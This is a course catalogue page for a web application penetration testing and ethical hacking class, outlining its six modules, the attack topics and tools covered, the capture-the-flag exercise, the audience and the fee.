Web App Penetration Testing and Ethical Hacking
This Course enables students to assess a web application’s security posture and convincingly demonstrate the business impact should attackers exploit the discovered vulnerabilities. You will practice the art of exploiting web applications to find flaws in your enterprise’s web apps. You’ll learn about the attacker’s tools and methods and, through detailed hands-on exercises, you will learn a best practice process for web application penetration testing, inject SQL into back-end databases to learn how attackers exfiltrate sensitive data, and utilize cross-site scripting attacks to dominate a target infrastructure. (Online classes available)
Skills Gained
YOU WILL BE ABLE TO:
- Apply OWASP’s methodology to your web application penetration tests to ensure they are consistent, reproducible, rigorous, and under quality control.
- Analyze the results from automated web testing tools to validate findings, determine their business impact, and eliminate false positives.
- Manually discover key web application flaws.
- Use Python to create testing and exploitation scripts during a penetration test.
- Discover and exploit SQL Injection flaws to determine true risk to the victim organization.
- Understand and exploit insecure deserialization vulnerabilities with ysoserial and similar tools.
- Create configurations and test payloads within other web attacks.
- Fuzz potential inputs for injection attacks with ZAP, BurP’S Intruder and ffuf.
- Explain the impact of exploitation of web application flaws.
- Analyze traffic between the client and the server application using tools such as the Zed Attack Proxy and BurpSuite Pro to find security issues within the client-side application code.
- Manually discover and exploit Cross-Site Request Forgery (CSRF) attacks.
- Manually discover and exploit Server-Side Request Forgery (SSRF) attacks.
- Use the Browser Exploitation Framework (BeEF) to hook victim browsers, attack client software and the network, and evaluate the potential impact that XSS flaws have within an application.
- Use the Nuclei tool to perform scans of target web sites/servers.
- Perform two complete web penetration tests, one during the five sections of course instruction, and the other during the Capture the Flag exercise.
BUSINESS TAKEAWAYS:
- Apply a repeatable methodology to deliver high-value penetration tests
- Discover and exploit key web application flaws
- Explain the potential impact of web application vulnerabilities
- Convey the importance of web application security to an overall security posture
- Wield key web application attack tools more efficiently
- Write web application penetration test reports
Course Content:
Module1: : Introduction and Information Gathering
Overview
Understanding the attacker’s perspective is key to successful web application penetration testing. The course begins by thoroughly examining foundational concepts such as web technology, including protocols, languages, clients, and server architectures, from the attacker’s perspective. We look at collecting open-source intelligence (OSINT) specific to data points likely to help exploitation be more successful, and we analyze the importance of encryption and HTTPS.
Section one concludes with profiling the target(s) to understand the underlying configuration. The collected data is used to build a profile of each server and identify potential configuration flaws. The discussion is underscored through several practical, hands-on labs in which we conduct reconnaissance in order to find forgotten virtual hosts. Students will get deeper hands-on experience with BurpSuite Pro, cURL, and manual exploitation techniques with tools such as nmap and testssl.sh.
Topics
-
- Overview of the web from a penetration tester’s perspective
- Web application assessment methodologies
- The penetration tester’s toolkit
- Interception proxies
- Proxying SSL through BurpSuite Pro and Zed Attack Proxy
- DNS reconnaissance
- Virtual host discovery
- Open-source intelligence (OSINT)
- The HTTP protocol
- Secure Sockets Layer (SSL) configurations and weaknesses
- Target discovery and profiling
- Configuration flaws
Module2: Content Discovery, Authentication, and Session Testing
Overview
Modern web applications frequently are not monitored as closely as they should, giving attackers the opportunity to discover, and exploit, vulnerabilities without anyone noticing. A systems configuration should involve proper logging and monitoring to ensure security-related events are not missed. That is why in this section we briefly explore logging configuration and basic incident response testing.
We enumerate the application’s pages and features. This phase involves identifying the components, analyzing the relationship between them, and determining how the pieces work together. We then dive deep into the spidering/crawling results, which represents a vital part of the overall penetration test, as well as perform forced browsing to find hidden content in a lab. This lab also introduces an extremely fast fuzzer, ffuf.
Topics
- Logging and monitoring
- Learning tools to spider a website
- Analyzing website content
- Brute forcing unlinked files and directories via ZAP and ffuf
- Web authentication mechanisms
- Fuzzing with Burp Intruder
- Username harvesting and password guessing
- Burp sequencer
- Session management and attacks
- Authentication and authorization bypass
- Mutillidae
Module3: Injection
After ending section two with authentication bypass, we begin section three by exploring security-related protections included in the web server responses: cookie flags and response headers.
This course section dives deeply into vital manual testing techniques for vulnerability discovery. We focus on developing in-depth knowledge of interception proxies for web application vulnerability discovery. Many of the most common injection flaws (command injection and local and remote file inclusion) are introduced, and followed with lab exercises, to reinforce the discovery and exploitation.
Besides this, a section covers insecure deserialization, a common vulnerability in object-oriented programming languages, where students will exploit a Java insecure deserialization vulnerability in a lab to steal a secret file from a vulnerable web application. This lab requires more effort and demonstrates chaining of vulnerabilities to achieve the final goal.
Due to its prevalence and the significant impact generally associated with the flaw, a considerable portion of this section is devoted to traditional and blind SQL injection.
Topics
- HTTP resonse security controls
- Command injection
- Directory traversal
- Local File Inclusion (LFI)
- Remote File Inclusion (RFI)
- Insecure deserialization
- SQL injection
- Blind SQL injection
- Error-based SQL injection
- Exploiting SQL injection
Module4: :XSS, SSRF, and XXE
Overview
Section four continues exploring injection flaws and spends time introducing Cross-Site Scripting (XSS) vulnerabilities, including reflected, stored, and DOM-based XSS vulnerabilities. Manual discovery methods are employed during hands-on labs, and students are introduced to the developer tools in browsers, as a means of analyzing client side JavaScript in modern web applications.
Section four also introduces the Browser Exploitation Framework (BeEF) to students, which is used in multiple labs. The course continues with a detailed discussion of AJAX as we explore how it enlarges the attack surface leveraged by penetration testers. We also analyze how AJAX is affected by other vulnerabilities already covered in depth earlier in the course.
We discuss REST (Representational State Transfer) and SOAP (Simple Object Access Protocol). Finally, section four ends with us covering server-side request forgery (SSRF) and XML external entities (XXE)both of which include an associated lab. Again, in the SSRF lab multiple vulnerabilities are chained, relying on previously covered material.
Topics
- Cross-Site Scripting (XSS)
- Browser Exploitation Framework (BeEF)
- AJAX
- XML and JSON
- Document Object Model (DOM)
- API attacks
- Data attacks
- REST and SOAP
- Server-Side Request Forgery (SSRF)
- XML Eternal Entity (XXE)
Module5: CSRF, Logic Flaws and Advanced Tools
Overview
During the fifth section, we launch actual exploits against real-world applications, expand our foothold within the application, and extend it to the network on which it resides. As penetration testers, we specifically focus on ways to leverage previously discovered vulnerabilities to gain further access, highlighting the cyclical nature of web application penetration testing.
During our exploitation phase, we expand our use of tools such as ZAP and BurpSuite Pro, plus complement them with further use of sqlmap and Metasploit to help craft exploits against various web applications. We launch SQL injection and Cross-Site Request Forgery attacks, amongst others. In class we exploit these flaws to perform data theft, hijack sessions, deface a website, get shells, pivot against connected networks, and much more. Through various forms of exploitation, students gain a keen understanding of the potential business impact of these flaws to an organization.
Topics
- Cross-Site Request Forgery (CSRF)
- Logic attacks
- Python for web app penetration testing
- WPScan
- ExploitDB
- BurpSuite Pro scanner
- Nuclei
- Metasploit
- When tools fail
- Business of Penetration Testing:
- Preparation
- Post Assessment and Reporting
Module6: Capture The Flag
Overview
During section six, students form teams and compete in a web application penetration testing tournament. This Netwars-powered Capture-the-Flag exercise provides students an opportunity to wield their newly developed or further honed skills to answer questions, complete missions, and exfiltrate data, applying skills gained throughout the course. The style of challenge and integrated hint system allows students of various skill levels to both enjoy a game environment and solidify the skills learned in class.
Who’s this course for?
- General security practitioners
- Penetration testers
- Ethical hackers
- Web application developers
- Website designers, architects, and developers
International Student Fee: 950 US$
Job Interview Preparation (Soft Skills Questions & Answers)
- Tough Open-Ended Job Interview Questions
- What to Wear for Best Job Interview Attire
- Job Interview Question- What are You Passionate About?
- How to Prepare for a Job Promotion Interview
🎥 Your FREE eLEARNING Courses (Click Here)
Internships, Freelance and Full-Time Work opportunities
Flexible Class Options
- Week End Classes For Professionals SAT | SUN
- Corporate Group Trainings Available
- Online Classes – Live Virtual Class (L.V.C), Online Training
Related Courses
Security Awareness – Managing Human Risk
Introduction to Cyber Security
Implementing and Auditing Security Frameworks and Controls
Security Essentials – Network, Endpoint, and Cloud
Hacker Tools, Techniques, and Incident Handling
Network Monitoring and Threat Detection In-Depth
Leadership Essentials -Security Leadership Essentials for Managers